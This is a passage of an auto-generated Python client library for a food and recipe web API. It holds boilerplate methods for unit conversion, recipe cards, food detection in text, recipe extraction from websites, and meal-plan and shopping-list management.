asynchronous HTTP request, please pass async_req=True
>>> thread = api.convert_amounts_with_http_info(ingredient_name, source_amount, source_unit, target_unit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_name: The ingredient which you want to convert. (required)
:param float source_amount: The amount from which you want to convert, e.g. the 2.5 in \"2.5 cups of flour to grams\". (required)
:param str source_unit: The unit from which you want to convert, e.g. the grams in \"2.5 cups of flour to grams\". You can also use \"piece\", e.g. \"3.4 oz tomatoes to piece\" (required)
:param str target_unit: The unit to which you want to convert, e.g. the grams in \"2.5 cups of flour to grams\". You can also use \"piece\", e.g. \"3.4 oz tomatoes to piece\" (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ingredient_name', 'source_amount', 'source_unit', 'target_unit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method convert_amounts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'ingredient_name' is set
if ('ingredient_name' not in local_var_params or
local_var_params['ingredient_name'] is None):
raise ApiValueError("Missing the required parameter `ingredient_name` when calling `convert_amounts`") # noqa: E501
# verify the required parameter 'source_amount' is set
if ('source_amount' not in local_var_params or
local_var_params['source_amount'] is None):
raise ApiValueError("Missing the required parameter `source_amount` when calling `convert_amounts`") # noqa: E501
# verify the required parameter 'source_unit' is set
if ('source_unit' not in local_var_params or
local_var_params['source_unit'] is None):
raise ApiValueError("Missing the required parameter `source_unit` when calling `convert_amounts`") # noqa: E501
# verify the required parameter 'target_unit' is set
if ('target_unit' not in local_var_params or
local_var_params['target_unit'] is None):
raise ApiValueError("Missing the required parameter `target_unit` when calling `convert_amounts`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'ingredient_name' in local_var_params:
query_params.append(('ingredientName', local_var_params['ingredient_name'])) # noqa: E501
if 'source_amount' in local_var_params:
query_params.append(('sourceAmount', local_var_params['source_amount'])) # noqa: E501
if 'source_unit' in local_var_params:
query_params.append(('sourceUnit', local_var_params['source_unit'])) # noqa: E501
if 'target_unit' in local_var_params:
query_params.append(('targetUnit', local_var_params['target_unit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/convert', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_recipe_card(self, title, image, ingredients, instructions, ready_in_minutes, servings, mask, background_image, **kwargs): # noqa: E501
"""Create Recipe Card # noqa: E501
Generate a recipe card for a recipe. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_recipe_card(title, image, ingredients, instructions, ready_in_minutes, servings, mask, background_image, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str title: The title of the recipe. (required)
:param file image: The binary image of the recipe as jpg. (required)
:param str ingredients: The ingredient list of the recipe, one ingredient per line (separate lines with \\\\n). (required)
:param str instructions: The instructions to make the recipe. One step per line (separate lines with \\\\n). (required)
:param float ready_in_minutes: The number of minutes it takes to get the recipe on the table. (required)
:param float servings: The number of servings the recipe makes. (required)
:param str mask: The mask to put over the recipe image (\\\"ellipseMask\\\", \\\"diamondMask\\\", \\\"starMask\\\", \\\"heartMask\\\", \\\"potMask\\\", \\\"fishMask\\\"). (required)
:param str background_image: The background image (\\\"none\\\",\\\"background1\\\", or \\\"background2\\\"). (required)
:param str author: The author of the recipe.
:param str background_color: The background color for the recipe card as a hex-string.
:param str font_color: The font color for the recipe card as a hex-string.
:param str source: The source of the recipe.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_recipe_card_with_http_info(title, image, ingredients, instructions, ready_in_minutes, servings, mask, background_image, **kwargs) # noqa: E501
else:
(data) = self.create_recipe_card_with_http_info(title, image, ingredients, instructions, ready_in_minutes, servings, mask, background_image, **kwargs) # noqa: E501
return data
def create_recipe_card_with_http_info(self, title, image, ingredients, instructions, ready_in_minutes, servings, mask, background_image, **kwargs): # noqa: E501
"""Create Recipe Card # noqa: E501
Generate a recipe card for a recipe. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_recipe_card_with_http_info(title, image, ingredients, instructions, ready_in_minutes, servings, mask, background_image, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str title: The title of the recipe. (required)
:param file image: The binary image of the recipe as jpg. (required)
:param str ingredients: The ingredient list of the recipe, one ingredient per line (separate lines with \\\\n). (required)
:param str instructions: The instructions to make the recipe. One step per line (separate lines with \\\\n). (required)
:param float ready_in_minutes: The number of minutes it takes to get the recipe on the table. (required)
:param float servings: The number of servings the recipe makes. (required)
:param str mask: The mask to put over the recipe image (\\\"ellipseMask\\\", \\\"diamondMask\\\", \\\"starMask\\\", \\\"heartMask\\\", \\\"potMask\\\", \\\"fishMask\\\"). (required)
:param str background_image: The background image (\\\"none\\\",\\\"background1\\\", or \\\"background2\\\"). (required)
:param str author: The author of the recipe.
:param str background_color: The background color for the recipe card as a hex-string.
:param str font_color: The font color for the recipe card as a hex-string.
:param str source: The source of the recipe.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['title', 'image', 'ingredients', 'instructions', 'ready_in_minutes', 'servings', 'mask', 'background_image', 'author', 'background_color', 'font_color', 'source'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_recipe_card" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'title' is set
if ('title' not in local_var_params or
local_var_params['title'] is None):
raise ApiValueError("Missing the required parameter `title` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'image' is set
if ('image' not in local_var_params or
local_var_params['image'] is None):
raise ApiValueError("Missing the required parameter `image` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'ingredients' is set
if ('ingredients' not in local_var_params or
local_var_params['ingredients'] is None):
raise ApiValueError("Missing the required parameter `ingredients` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'instructions' is set
if ('instructions' not in local_var_params or
local_var_params['instructions'] is None):
raise ApiValueError("Missing the required parameter `instructions` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'ready_in_minutes' is set
if ('ready_in_minutes' not in local_var_params or
local_var_params['ready_in_minutes'] is None):
raise ApiValueError("Missing the required parameter `ready_in_minutes` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'servings' is set
if ('servings' not in local_var_params or
local_var_params['servings'] is None):
raise ApiValueError("Missing the required parameter `servings` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'mask' is set
if ('mask' not in local_var_params or
local_var_params['mask'] is None):
raise ApiValueError("Missing the required parameter `mask` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'background_image' is set
if ('background_image' not in local_var_params or
local_var_params['background_image'] is None):
raise ApiValueError("Missing the required parameter `background_image` when calling `create_recipe_card`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'title' in local_var_params:
form_params.append(('title', local_var_params['title'])) # noqa: E501
if 'image' in local_var_params:
local_var_files['image'] = local_var_params['image'] # noqa: E501
if 'ingredients' in local_var_params:
form_params.append(('ingredients', local_var_params['ingredients'])) # noqa: E501
if 'instructions' in local_var_params:
form_params.append(('instructions', local_var_params['instructions'])) # noqa: E501
if 'ready_in_minutes' in local_var_params:
form_params.append(('readyInMinutes', local_var_params['ready_in_minutes'])) # noqa: E501
if 'servings' in local_var_params:
form_params.append(('servings', local_var_params['servings'])) # noqa: E501
if 'mask' in local_var_params:
form_params.append(('mask', local_var_params['mask'])) # noqa: E501
if 'background_image' in local_var_params:
form_params.append(('backgroundImage', local_var_params['background_image'])) # noqa: E501
if 'author' in local_var_params:
form_params.append(('author', local_var_params['author'])) # noqa: E501
if 'background_color' in local_var_params:
form_params.append(('backgroundColor', local_var_params['background_color'])) # noqa: E501
if 'font_color' in local_var_params:
form_params.append(('fontColor', local_var_params['font_color'])) # noqa: E501
if 'source' in local_var_params:
form_params.append(('source', local_var_params['source'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/visualizeRecipe', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_from_meal_plan(self, username, id, hash, inline_object12, **kwargs): # noqa: E501
"""Delete from Meal Plan # noqa: E501
Delete an item from the user's meal plan. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_from_meal_plan(username, id, hash, inline_object12, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param float id: The shopping list item id. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject12 inline_object12: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_from_meal_plan_with_http_info(username, id, hash, inline_object12, **kwargs) # noqa: E501
else:
(data) = self.delete_from_meal_plan_with_http_info(username, id, hash, inline_object12, **kwargs) # noqa: E501
return data
def delete_from_meal_plan_with_http_info(self, username, id, hash, inline_object12, **kwargs): # noqa: E501
"""Delete from Meal Plan # noqa: E501
Delete an item from the user's meal plan. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_from_meal_plan_with_http_info(username, id, hash, inline_object12, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param float id: The shopping list item id. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject12 inline_object12: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['username', 'id', 'hash', 'inline_object12'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_from_meal_plan" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `delete_from_meal_plan`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `delete_from_meal_plan`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `delete_from_meal_plan`") # noqa: E501
# verify the required parameter 'inline_object12' is set
if ('inline_object12' not in local_var_params or
local_var_params['inline_object12'] is None):
raise ApiValueError("Missing the required parameter `inline_object12` when calling `delete_from_meal_plan`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'inline_object12' in local_var_params:
body_params = local_var_params['inline_object12']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/{username}/items/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_from_shopping_list(self, username, id, hash, inline_object15, **kwargs): # noqa: E501
"""Delete from Shopping List # noqa: E501
Delete an item from the current shopping list of the user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_from_shopping_list(username, id, hash, inline_object15, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param float id: The shopping list item id. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject15 inline_object15: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_from_shopping_list_with_http_info(username, id, hash, inline_object15, **kwargs) # noqa: E501
else:
(data) = self.delete_from_shopping_list_with_http_info(username, id, hash, inline_object15, **kwargs) # noqa: E501
return data
def delete_from_shopping_list_with_http_info(self, username, id, hash, inline_object15, **kwargs): # noqa: E501
"""Delete from Shopping List # noqa: E501
Delete an item from the current shopping list of the user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_from_shopping_list_with_http_info(username, id, hash, inline_object15, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param float id: The shopping list item id. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject15 inline_object15: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['username', 'id', 'hash', 'inline_object15'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_from_shopping_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `delete_from_shopping_list`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `delete_from_shopping_list`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `delete_from_shopping_list`") # noqa: E501
# verify the required parameter 'inline_object15' is set
if ('inline_object15' not in local_var_params or
local_var_params['inline_object15'] is None):
raise ApiValueError("Missing the required parameter `inline_object15` when calling `delete_from_shopping_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'inline_object15' in local_var_params:
body_params = local_var_params['inline_object15']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/{username}/shopping-list/items/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def detect_food_in_text(self, text, **kwargs): # noqa: E501
"""Detect Food in Text # noqa: E501
Take any text and find all mentions of food contained within it. This task is also called Named Entity Recognition (NER). In this case, the entities are foods. Either dishes, such as pizza or cheeseburger, or ingredients, such as cucumber or almonds. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_food_in_text(text, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str text: The text in which food items, such as dish names and ingredients, should be detected in. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.detect_food_in_text_with_http_info(text, **kwargs) # noqa: E501
else:
(data) = self.detect_food_in_text_with_http_info(text, **kwargs) # noqa: E501
return data
def detect_food_in_text_with_http_info(self, text, **kwargs): # noqa: E501
"""Detect Food in Text # noqa: E501
Take any text and find all mentions of food contained within it. This task is also called Named Entity Recognition (NER). In this case, the entities are foods. Either dishes, such as pizza or cheeseburger, or ingredients, such as cucumber or almonds. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_food_in_text_with_http_info(text, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str text: The text in which food items, such as dish names and ingredients, should be detected in. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['text'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method detect_food_in_text" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'text' is set
if ('text' not in local_var_params or
local_var_params['text'] is None):
raise ApiValueError("Missing the required parameter `text` when calling `detect_food_in_text`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'text' in local_var_params:
form_params.append(('text', local_var_params['text'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/detect', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def extract_recipe_from_website(self, url, **kwargs): # noqa: E501
"""Extract Recipe from Website # noqa: E501
This endpoint lets you extract recipe data such as title, ingredients, and instructions from any properly formatted Website. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.extract_recipe_from_website(url, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str url: The URL of the recipe page. (required)
:param bool force_extraction: If true, the extraction will be triggered whether we already know the recipe or not. Use this only if information is missing as this operation is slower.
:param bool analyze: If true, the recipe will be analyzed and classified resolving in more data such as cuisines, dish types, and more.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.extract_recipe_from_website_with_http_info(url, **kwargs) # noqa: E501
else:
(data) = self.extract_recipe_from_website_with_http_info(url, **kwargs) # noqa: E501
return data
def extract_recipe_from_website_with_http_info(self, url, **kwargs): # noqa: E501
"""Extract Recipe from Website # noqa: E501
This endpoint lets you extract recipe data such as title, ingredients, and instructions from any properly formatted Website. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.extract_recipe_from_website_with_http_info(url, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str url: The URL of the recipe page. (required)
:param bool force_extraction: If true, the extraction will be triggered whether we already know the recipe or not. Use this only if information is missing as this operation is slower.
:param bool analyze: If true, the recipe will be analyzed and classified resolving in more data such as cuisines, dish types, and more.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['url', 'force_extraction', 'analyze'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method extract_recipe_from_website" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'url' is set
if ('url' not in local_var_params or
local_var_params['url'] is None):
raise ApiValueError("Missing the required parameter `url` when calling `extract_recipe_from_website`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'url' in local_var_params:
query_params.append(('url', local_var_params['url'])) # noqa: E501
if 'force_extraction' in local_var_params:
query_params.append(('forceExtraction', local_var_params['force_extraction'])) # noqa: E501
if 'analyze' in local_var_params:
query_params.append(('analyze', local_var_params['analyze'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/extract', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def generate_meal_plan(self, **kwargs): # noqa: E501
"""Generate Meal Plan # noqa: E501
Generate a meal plan with three meals per day (breakfast, lunch, and dinner). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_meal_plan(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str time_frame: Either for one \"day\" or an entire \"week\".
:param float target_calories: What is the caloric target for one day? The meal plan generator will try to get as close as possible to that goal.
:param str diet: Enter a diet that the meal plan has to adhere to. See a full list of supported diets.
:param str exclude: A comma-separated list of allergens or ingredients that must be excluded.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.generate_meal_plan_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.generate_meal_plan_with_http_info(**kwargs) # noqa: E501
return data
def generate_meal_plan_with_http_info(self, **kwargs): # noqa: E501
"""Generate Meal Plan # noqa: E501
Generate a meal plan with three meals per day (breakfast, lunch, and dinner). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_meal_plan_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str time_frame: Either for one \"day\" or an entire \"week\".
:param float target_calories: What is the caloric target for one day? The meal plan generator will try to get as close as possible to that goal.
:param str diet: Enter a diet that the meal plan has to adhere to. See a full list of supported diets.
:param str exclude: A comma-separated list of allergens or ingredients that must be excluded.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['time_frame', 'target_calories', 'diet', 'exclude'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method generate_meal_plan" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'time_frame' in local_var_params:
query_params.append(('timeFrame', local_var_params['time_frame'])) # noqa: E501
if 'target_calories' in local_var_params:
query_params.append(('targetCalories', local_var_params['target_calories'])) # noqa: E501
if 'diet' in local_var_params:
query_params.append(('diet', local_var_params['diet'])) # noqa: E501
if 'exclude' in local_var_params:
query_params.append(('exclude', local_var_params['exclude'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/generate', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def generate_shopping_list(self, username, start_date, end_date, hash, inline_object13, **kwargs): # noqa: E501
"""Generate Shopping List # noqa: E501
Generate the shopping list for a user from the meal planner in a given time frame. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_shopping_list(username, start_date, end_date, hash, inline_object13, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str start_date: The start date in the format yyyy-mm-dd. (required)
:param str end_date: The end date in the format yyyy-mm-dd. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject13 inline_object13: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.generate_shopping_list_with_http_info(username, start_date, end_date, hash, inline_object13, **kwargs) # noqa: E501
else:
(data) = self.generate_shopping_list_with_http_info(username, start_date, end_date, hash, inline_object13, **kwargs) # noqa: E501
return data
def generate_shopping_list_with_http_info(self, username, start_date, end_date, hash, inline_object13, **kwargs): # noqa: E501
"""Generate Shopping List # noqa: E501
Generate the shopping list for a user from the meal planner in a given time frame. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_shopping_list_with_http_info(username, start_date, end_date, hash, inline_object13, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str start_date: The start date in the format yyyy-mm-dd. (required)
:param str end_date: The end date in the format yyyy-mm-dd. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject13 inline_object13: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['username', 'start_date', 'end_date', 'hash', 'inline_object13'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method generate_shopping_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `generate_shopping_list`") # noqa: E501
# verify the required parameter 'start_date' is set
if ('start_date' not in local_var_params or
local_var_params['start_date'] is None):
raise ApiValueError("Missing the required parameter `start_date` when calling `generate_shopping_list`") # noqa: E501
# verify the required parameter 'end_date' is set
if ('end_date' not in local_var_params or
local_var_params['end_date'] is None):
raise ApiValueError("Missing the required parameter `end_date` when calling `generate_shopping_list`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `generate_shopping_list`") # noqa: E501
# verify the required parameter 'inline_object13' is set
if ('inline_object13' not in local_var_params or
local_var_params['inline_object13'] is None):
raise ApiValueError("Missing the required parameter `inline_object13` when calling `generate_shopping_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
if 'start_date' in local_var_params:
path_params['start-date'] = local_var_params['start_date'] # noqa: E501
if 'end_date' in local_var_params:
path_params['end-date'] = local_var_params['end_date'] # noqa: E501
query_params = []
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'inline_object13' in local_var_params:
body_params = local_var_params['inline_object13']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/{username}/shopping-list/{start-date}/{end-date}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
